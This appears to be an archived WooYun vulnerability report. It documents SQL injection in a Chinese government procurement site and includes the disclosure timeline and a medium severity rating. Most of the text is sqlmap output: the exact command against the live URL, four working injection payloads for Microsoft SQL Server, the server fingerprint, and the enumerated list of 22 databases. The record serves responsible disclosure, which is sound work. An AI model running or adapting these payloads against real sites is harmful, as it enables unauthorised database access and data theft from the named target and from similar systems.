乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-24: 细节已通知厂商并且等待厂商处理中 2014-11-28: 厂商已经确认,细节仅向厂商公开 2014-12-08: 细节向核心白帽子及相关领域专家公开 2014-12-18: 细节向普通白帽子公开 2014-12-28: 细节向实习白帽子公开 2015-01-08: 细节向公众公开
注射一枚,
sqlmap.py -u http://www.zsztb.gov.cn/PubNews/PubNewsView.aspx?parentclassid=01 --dbs -v 0Place: GETParameter: parentclassid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: parentclassid=01%' AND 6340=6340 AND '%'=' Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: parentclassid=01%' AND 1505=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(111)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (1505=1505) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(119)+CHAR(115)+CHAR(102)+CHAR(58))) AND '%'=' Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: parentclassid=01%'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: parentclassid=01%' WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008available databases [22]:[*] ASPState[*] master[*] menjin[*] mjbak[*] model[*] msdb[*] orgdata[*] ReportServer[*] ReportServerTempDB[*] temp[*] tempdb[*] xpshop[*] zsztb[*] zsztb0724[*] zsztb140325[*] zsztb140520[*] zsztb140720[*] zsztb_ccb[*] zsztb_ccb_141009[*] zsztb_copy[*] zsztb_test
NULL
危害等级:中
漏洞Rank:10
确认时间:2014-11-28 15:10
暂无